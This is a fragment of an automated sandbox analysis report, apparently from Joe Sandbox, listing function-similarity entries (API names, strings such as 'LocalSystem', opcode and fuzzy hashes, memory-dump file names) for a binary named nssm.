                                                                                                                                                                                                                                  • API String ID: 3367045223-1317115628
                                                                                                                                                                                                                                  • Opcode ID: e5d61ac5fe3e494e8c5f5bb66a24c9633b6ca6623c6e49d2acf3bfaf0581b5d9
                                                                                                                                                                                                                                  • Instruction ID: c39c4c4d40262694a85a816a057cfbddc329c61cd3073dfd6161a8af6a2d6d8a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5d61ac5fe3e494e8c5f5bb66a24c9633b6ca6623c6e49d2acf3bfaf0581b5d9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C314FB571854141EA2BDB57B1517EE5351A78EBC0F980121FF490BBAADA3ECA428700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$Source$DeregisterRegisterReport_snwprintf_s
                                                                                                                                                                                                                                  • String ID: %s%s$set_createfile_parameter()
                                                                                                                                                                                                                                  • API String ID: 3081108292-102671490
                                                                                                                                                                                                                                  • Opcode ID: 4c8e137691200f9802873ce3f272839560d28b94a2ae6c4040dfe00046d625de
                                                                                                                                                                                                                                  • Instruction ID: 70ef784a158b80312296fa034f903e8201da94003219a63623cd87d9af07ac98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c8e137691200f9802873ce3f272839560d28b94a2ae6c4040dfe00046d625de
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9201B57261464442F612DB66F8407EA6290B78C7E4F544325BB9C476E5DF3CC5058740
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LocalSystem
                                                                                                                                                                                                                                  • API String ID: 0-3718507506
                                                                                                                                                                                                                                  • Opcode ID: aedaa6aa0cf95f0d6213331db337fc2562fe03aa0d6f655ffaa2188851bafd5a
                                                                                                                                                                                                                                  • Instruction ID: c8c17bd1662082d4aa11bc81820134ebacc20a5a73c6272a6f111933698fbafa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aedaa6aa0cf95f0d6213331db337fc2562fe03aa0d6f655ffaa2188851bafd5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E10169B271464482EB568B67B8403E66291ABDC7C1F482024BF06876B5EF78C8E58600